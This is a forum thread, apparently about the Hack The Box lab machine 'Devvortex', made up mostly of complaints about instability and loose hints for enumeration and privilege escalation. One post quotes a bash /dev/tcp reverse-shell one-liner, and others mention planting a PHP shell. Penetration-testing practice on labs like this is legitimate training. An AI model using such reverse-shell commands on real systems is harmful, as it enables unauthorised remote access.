Official Devvortex Discussion

Then you can search on kali repo.

Very, very easy and straightforward machine. My only issue was that I couldn’t, for the life of me, gain a foothold for the longest simply because the application was always crashed.
Once I got it, everything took less than 30 minutes, it feels like.

Any nudges just PM me.

Yes, I was having the same issue with the web front end app always bombing out. I thought it was harder than very, very easy but did enjoy the box once it was stable. :slight_smile:

Maybe it was the privesc that was causing it to go unresponsive? Not sure


Could you elaborate a bit for virtual box how to do this?

I couldn’t find anything only to make it work for either parror or kali

So weird…I perform Subdomain enumeration, using the exact same word list as someone else but it does not return me what I’m looking for!? how is this possible - exact same syntax, but it reveals the subdomain for my friend but not for me hangs at “Checking for TTY (sudo/su) passwords in audit logs”, never gets past that point. Using pwnbox. Anyone run into similar or have any advice?

I know I’m a bit late on this one but agree with the others in this thread; the webapp constantly broke and required machine resets … very frustrating. I would spend a lot more time on HTB if everything wasn’t so GD time consuming … even easy boxes take a long time when things are slow or unresponsive.

User - perform subdomain enumeration as well as normal directory enumeration, google is also your friend.

Root - google is also your friend here - many demonstrated PEs on the internet.

got the rev shell but cannot move since it become alive for 2-5 seconds only : )
the webserver giving me 502 badgate way evey min
the machine is not stable at all

: )

I have achieved RCE but i can’t get a reverse shell, I have gotten it in many machines before with bash -i >& /dev/tcp/ 0>&1. Have I fallen in a rabbit hole?


Im having the same issue, when i enter the credentials it starts to load then i get the error 504.

If someone has a clue please share.

Thank you in advance.

As bad as it sounds i only had to reset the Machine and try again and it worked.

Anyone have this issue?
■■■■ does not work. I don’t get any output.

Edit: Need to spawn a full TTY.

i changed the VPN location and it worked for me

Please don’t destroy the application… don’t put your shell on the main page. Create another file or put the php code in the error page. Thank you -.-’

The machine is broken again. Please careful when root

WARNING: Failed to daemonise. This is quite common and not fatal. Connection timed out (110)

I tried to login 3-4 times but it is showing the same thing

So I got kinda late into this machine But anyway… I find and issue with finding subdomains using gobuster and ffuf. Starting with gobuster, it finds no subdomains while in ffuf the flag -mc and the status doesnt work in order for me to find a specific domain. Can anyone help??? Btw I found this problem in other htb machines too…

I am using also htb’s pawnbox